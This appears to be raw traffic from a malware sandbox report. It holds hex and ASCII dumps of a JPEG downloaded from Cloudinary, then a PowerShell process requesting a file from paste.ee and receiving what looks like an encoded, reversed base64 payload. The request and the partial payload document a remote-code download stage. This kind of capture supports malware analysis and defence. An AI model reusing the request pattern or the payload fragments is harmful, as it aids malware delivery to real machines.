                                                                                                                    Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-13T06:38:33.003Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
                                                                                                                    Server: Cloudinary
                                                                                                                    Timing-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                    x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                    Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                    Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                    Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                    Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                    Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                    Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                    Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                    Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                    2024-12-13 06:38:33 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                    Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.649771104.21.84.674436556C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-13 06:38:53 UTC67OUTGET /r/o8fzA/0 HTTP/1.1
                                                                                                                    Host: paste.ee
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-13 06:38:53 UTC1290INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 13 Dec 2024 06:38:53 GMT
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=2592000
                                                                                                                    strict-transport-security: max-age=63072000
                                                                                                                    x-frame-options: DENY
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 38119
                                                                                                                    Last-Modified: Thu, 12 Dec 2024 20:03:34 GMT
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jymjEPefTGsWQP4BWiP76E59lmXZKJJc0ALrmnv0Oevga%2BGylOiF%2B6O98yHx3%2BV6bp4zM10%2FSQgs7%2B8poYGEzCzjXc0CftoG5MBmaJH3XuU5fdDG4jcqQZMXiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f13f4302e2dc336-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-12-13 06:38:53 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 38 36 26 6d 69 6e 5f 72 74 74 3d 31 34 38 33 26 72 74 74 5f 76 61 72 3d 35 36 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 32 39 39 34 30 26 63 77 6e 64 3d 32 34 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 61 37 66 38 66 38 63 32 35 64 35 36 34 32 37 26 74 73 3d 34 35 38 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                    Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1483&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1929940&cwnd=244&unsent_bytes=0&cid=ca7f8f8c25d56427&ts=458&x=0"
                                                                                                                    2024-12-13 06:38:53 UTC1233INData Raw: 33 38 33 31 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 34 7a 44 32 38 77 4c 50 63 79 44 66 38 67 46 50 4d 78 44 4c 38 41 77 4f 6b 76 44 78 37 51 36 4f 41 75 44 59 37 77 7a 4f 63 6f 44 38 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a
                                                                                                                    Data Ascii: 3831AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4zD28wLPcyDf8gFPMxDL8AwOkvDx7Q6OAuDY7wzOcoD86wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
                                                                                                                    2024-12-13 06:38:53 UTC1369INData Raw: 4f 6b 67 44 46 33 77 2f 4e 30 66 44 38 33 77 2b 4e 6f 66 44 32 33 51 39 4e 45 66 44 72 33 51 36 4e 67 65 44 6e 33 67 35 4e 49 65 44 68 33 51 33 4e 63 64 44 56 33 41 31 4e 4d 64 44 50 33 67 7a 4e 6f 63 44 45 33 67 77 4e 45 63 44 41 32 77 76 4e 73 62 44 36 32 67 74 4e 41 62 44 75 32 51 72 4e 77 61 44 6f 32 77 70 4e 4d 61 44 64 32 77 6d 4e 6f 5a 44 57 32 51 6c 4e 45 5a 44 4c 32 51 69 4e 67 59 44 45 32 77 51 4e 30 58 44 38 31 77 65 4e 6f 58 44 6b 31 67 59 4e 45 43 41 41 42 51 47 41 47 41 4d 41 41 41 77 4f 6f 74 44 5a 77 41 44 41 41 41 41 45 41 59 41 73 41 73 44 4d 37 67 69 4f 55 72 44 30 36 77 73 4f 59 71 44 65 36 77 6c 4f 38 6f 44 4f 36 67 69 4f 51 6b 44 32 35 67 63 4f 73 6d 44 71 35 67 59 4f 45 6d 44 67 35 77 48 41 41 41 41 4d 41 59 41 67 41 67 44 67 34 77
                                                                                                                    Data Ascii: OkgDF3w/N0fD83w+NofD23Q9NEfDr3Q6NgeDn3g5NIeDh3Q3NcdDV3A1NMdDP3gzNocDE3gwNEcDA2wvNsbD62gtNAbDu2QrNwaDo2wpNMaDd2wmNoZDW2QlNEZDL2QiNgYDE2wQN0XD81weNoXDk1gYNECAABQGAGAMAAAwOotDZwADAAAAEAYAsAsDM7giOUrD06wsOYqDe6wlO8oDO6giOQkD25gcOsmDq5gYOEmDg5wHAAAAMAYAgAgDg4w
                                                                                                                    2024-12-13 06:38:53 UTC1369INData Raw: 45 72 44 76 36 51 72 4f 73 71 44 70 36 77 70 4f 55 71 44 6a 36 51 6f 4f 38 70 44 64 36 77 6d 4f 6b 70 44 58 36 51 6c 4f 4d 70 44 52 36 77 6a 4f 30 6f 44 4c 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 2b 4e 63 66 44 31 33 77 38
                                                                                                                    Data Ascii: ErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8
                                                                                                                    2024-12-13 06:38:53 UTC1369INData Raw: 58 44 34 31 67 64 4e 51 58 44 79 31 41 63 4e 34 57 44 73 31 67 61 4e 67 57 44 6d 31 41 5a 4e 49 57 44 67 31 67 58 4e 77 56 44 61 31 41 57 4e 59 56 44 55 31 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d
                                                                                                                    Data Ascii: XD41gdNQXDy1AcN4WDs1gaNgWDm1AZNIWDg1gXNwVDa1AWNYVDU1gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvM
                                                                                                                    2024-12-13 06:38:53 UTC1369INData Raw: 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 51 45 4f 41 68 44 50 34 67 44 4f 30 67 44 4d 34 77 43 4f 6f 67 44 4a 34 41 43 4f 63 67 44 47 34 51 42 4f 51 67 44 41 33 77 2f 4e 34 66 44 39 33 41 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 77 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44 71 33 51 36 4e 67 65 44 6e 33 67 35 4e 55 65 44 6b 33 77 34 4e 49
                                                                                                                    Data Ascii: DZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NI
                                                                                                                    2024-12-13 06:38:53 UTC1369INData Raw: 41 41 41 77 50 68 2f 54 49 2b 41 74 50 47 36 7a 4f 2b 49 54 50 47 33 54 76 39 41 55 50 33 77 44 74 38 6f 32 4f 7a 74 7a 41 36 34 63 4f 65 6e 7a 79 35 4d 55 4f 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41
                                                                                                                    Data Ascii: AAAwPh/TI+AtPG6zO+ITPG3Tv9AUP3wDt8o2OztzA64cOenzy5MUONgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAA
